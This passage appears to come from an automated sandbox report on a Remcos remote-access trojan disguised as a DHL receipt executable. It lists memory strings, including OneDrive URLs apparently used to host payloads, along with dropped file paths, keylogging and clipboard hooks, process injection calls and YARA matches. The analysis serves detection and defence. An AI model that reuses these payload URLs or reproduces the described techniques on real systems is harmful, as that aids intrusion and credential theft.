              Source: bhvC179.tmp.20.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
              Source: bhvC179.tmp.20.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=0000
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
              Source: bhvC179.tmp.20.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
              Source: remcos.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
              Source: bhvC179.tmp.20.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
              Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: remcos.exe, 0000002C.00000002.2022678226.000000000289C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
              Source: bhvC179.tmp.20.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/
              Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/D
              Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/J
              Source: remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4
              Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4
              Source: remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtd
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sx
              Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com/y4myOimuUAmzYYCQg7S5DPHrV2LTkb-aNzDgiFFvLFPMKX5riRJbzax3M8WqO_jLV-z
              Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyv
              Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51
              Source: remcos.exe, 00000005.00000002.4124047800.0000000000647000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANi
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6R
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhvC179.tmp.20.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhvC179.tmp.20.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
              Source: bhvC179.tmp.20.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: bhvC179.tmp.20.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
              Source: bhvC179.tmp.20.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
              Source: bhvC179.tmp.20.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: remcos.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvC179.tmp.20.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4A2B8 SetWindowsHookExA 0000000D,2DA4A2A4,000000000_2_2DA4A2B8
              Installs a global keyboard hook
              Source: C:\ProgramData\Remcos\remcos.exeWindows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA56940 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_2DA56940
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA568C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_2DA568C1
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,20_2_0040987A
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004098E2
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA56940 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_2DA56940
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_2DA4A3E0
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\trhrth\logs.dat, type: DROPPED

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5C9E2 SystemParametersInfoW,0_2_2DA5C9E2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BC9E2 SystemParametersInfoW,5_2_2D5BC9E2
              Reads the Security eventlog
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Reads the System eventlog
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: DHL119040 receipt document,pdf.exe
              Source: initial sampleStatic PE information: Filename: DHL119040 receipt document,pdf.exe
              Source: C:\ProgramData\Remcos\remcos.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028B81B8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028BC7B4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028BC724
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_028B7A94
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BDA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,0_2_028BDA24
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_028BC898
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BD9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,0_2_028BD9A4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028B7944
